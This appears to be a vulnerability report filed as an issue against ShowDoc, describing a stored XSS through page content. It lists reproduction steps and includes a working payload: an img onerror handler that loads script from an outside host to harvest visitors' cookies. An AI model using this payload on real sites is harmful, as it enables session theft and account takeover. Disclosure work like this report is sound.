Closed
Description
Hello friend,we are farmsec security team,we found a stored xss vulnerability in ShowDoc:
1.Click to register

2.Fill in user information

Click to register.
3.Start a new project

Click new project.
4.Fill in the project information

Click submit.
5.Click on the new project

Click on the new project xss test
6.Click + to create a new page

7.Fill in the xss vulnerability test payload
payload:
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xxe.im/peKD';>
Click save

Access page

8.Get the user's cookie information

Metadata
Metadata
Assignees
Labels
No labels